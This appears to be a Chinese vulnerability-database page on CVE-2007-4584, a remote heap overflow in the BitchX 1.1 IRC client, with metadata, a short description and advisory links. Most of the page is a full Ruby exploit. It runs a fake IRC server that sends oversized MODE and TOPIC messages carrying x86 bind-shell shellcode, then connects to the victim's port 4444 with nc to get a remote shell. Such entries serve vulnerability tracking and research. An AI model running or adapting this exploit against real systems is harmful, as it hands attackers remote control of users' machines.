BitchX IRC MODE消息远程堆溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113527 漏洞类型 缓冲区溢出
发布时间 2007-08-27 更新时间 2009-04-27
CVE编号 CVE-2007-4584 CNNVD-ID CNNVD-200708-467
漏洞平台 Linux CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/4321
https://www.securityfocus.com/bid/25462
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-467
|漏洞详情
BitchX是一款流行的IRC聊天客户端。BitchX在处理畸形的IRCMODE消息时存在堆溢出漏洞,远程攻击者可能利用此漏洞控制客户端系统。如果用户受骗连接到了恶意的服务器并向IRC客户端发送了带有超长参数的MODE消息的话,就会触发这个溢出,导致执行任意指令。
|漏洞EXP
#!/usr/bin/env ruby
######################################################
# BitchX-1.1 Final MODE Heap Overflow [0-day]
# By bannedit
# Discovered May 16th 2007
# - Yet another overflow which can overwrite GOT
#
# I found this vuln after modifying ilja's ircfuzz
# code. Currently this exploit attempts to
# overwrite the GOT with the ret address to the
# shellcode.
#
# The actually vulnerability appears to be a stack
# overflow in p_mode. Due to input size restrictions
# the overflow can't occur on the stack because we can
# only overflow so much data. Luckily though we
# overwrite a structure containing pointers to heap
# data. This allows us to overwrite the GOT.
#
# Reliability of this exploit in its current stage is
# limited. There appears to be several factors which
# restrict the reliability.
#######################################################

require 'socket'

#the linux 2.6 target most effective atm
targets = { 'linux 2.6' => '0x81861c8', 'linux 2.6 Hardened (FC6)' =>
'0x8154d70','freebsd' => '0x41414141' }

shellcode = #fork before binding a shell provides a clean exit
            "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80"+

             #metasploit linux x86 shellcode bind tcp port 4444
            "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfc"+
            "\x98\xd8\xb8\x83\xeb\xfc\xe2\xf4\xcd\x43\x8b\xfb\xaf\xf2\xda\xd2"+
            "\x9a\xc0\x41\x31\x1d\x55\x58\x2e\xbf\xca\xbe\xd0\xed\xc4\xbe\xeb"+
            "\x75\x79\xb2\xde\xa4\xc8\x89\xee\x75\x79\x15\x38\x4c\xfe\x09\x5b"+
            "\x31\x18\x8a\xea\xaa\xdb\x51\x59\x4c\xfe\x15\x38\x6f\xf2\xda\xe1"+
            "\x4c\xa7\x15\x38\xb5\xe1\x21\x08\xf7\xca\xb0\x97\xd3\xeb\xb0\xd0"+
            "\xd3\xfa\xb1\xd6\x75\x7b\x8a\xeb\x75\x79\x15\x38"
           

port = (ARGV[0] || 6667).to_i
sock = TCPServer.new('0.0.0.0', port)

ret = (targets['linux 2.6 Hardened (FC6)'].hex)

puts "----------------------------------------------"
puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -"
puts "- By bannedit                                -"
puts "----------------------------------------------"


puts "\n[-] listening for incoming clients..."

while (client = sock.accept)
   ip = client.peeraddr

   buffer = client.gets
   puts "[<] #{buffer}"
  
   hostname = ([ret].pack('V')) * 13
   nick = "bannedit"

   #Fake server reply to connection
   buffer = ":#{nick} MODE #{nick} :+iw\r\n"+
            ":0 001 #{nick} :biznitch-1.0\r\n"+
            ":5 002 #{nick} :biznitch-1.0\r\n"+
            ":6 003 #{nick} :a\r\n"+
            ":aaa 004 #{nick} :a\r\n"+
            ":aaa 005 #{nick} :a\r\n"+
            ":aaa 251 #{nick} :a\r\n"+
            ":aaa 252 #{nick} :a\r\n"+
            ":aaa 253 #{nick} :a\r\n"+
            ":aaa 254 #{nick} :a\r\n"+
            ":aaa 255 #{nick} :a\r\n"+
            ":aaa 375 #{nick} :a\r\n"+
            ":aaa 372 #{nick} :a\r\n"+
            ":aaa 376 #{nick} :a\r\n"
           
   join =   ":aaa 302 #{nick} :#{nick}=+#{nick}@#{nick}\r\n"+      
            ":#{nick}!#{nick}@#{hostname * 4} JOIN :#hackers\r\n"

   puts "[>] sending fake server response"
   client.send(buffer, 0)
   sleep(2)
#   client.send(join, 0)

   topic =  ":aaa TOPIC #hackers:"
   ret = ret + 0x200
   topic<<  ([ret].pack('V')) * 100
   topic<< "\r\n"
   for i in 0..20
   client.send(topic, 0)
   end

   puts "[>] sending evil buffer"
   evilbuf = ":#{hostname}  MODE "
   evilbuf<< "#{nick} :aaa"
   ret = ret + 0x200
   evilbuf<< ([ret].pack('V')) * 200
   evilbuf<< "\x90" * (1126 - shellcode.length)
   evilbuf<< shellcode
   evilbuf<< "\x90" * 40
   evilbuf<< "\r\n"
  
   for i in 0..5
      client.send(evilbuf, 0)
   end

sleep(10) #wait for the shellcode to do its thing...

puts "[+] exploit completed if successful port 4444 should be open"
puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell...\n\n"

   fork {
           system("nc #{ip[3]} 4444")
           puts "[+] exiting shell dropping back to listener"
        }
end

# milw0rm.com [2007-08-27]
|受影响的产品
Slackware Linux -current Gentoo Linux BitchX IRC Client 1.1
|参考资料

来源:MILW0RM
名称:4321
链接:http://www.milw0rm.com/exploits/4321
来源:SLACKWARE
名称:SSA:2009-116-02
链接:http://slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.285737
来源:GENTOO
名称:GLSA-200807-12
链接:http://security.gentoo.org/glsa/glsa-200807-12.xml
来源:SECUNIA
名称:34870
链接:http://secunia.com/advisories/34870
来源:SECUNIA
名称:31180
链接:http://secunia.com/advisories/31180
来源:SECUNIA
名称:26578
链接:http://secunia.com/advisories/26578
来源:OSVDB
名称:37480
链接:http://osvdb.org/37480
来源:XF
名称:bitchx-pmode-bo(36306)
链接:http://xforce.iss.net/xforce/xfdb/36306
来源:BID
名称:25462
链接:http://www.securityfocus.com/bid/25462
来源:VUPEN
名称:ADV-2007-2994
链接:http://www.frsirt.com/english/advisories/2007/2994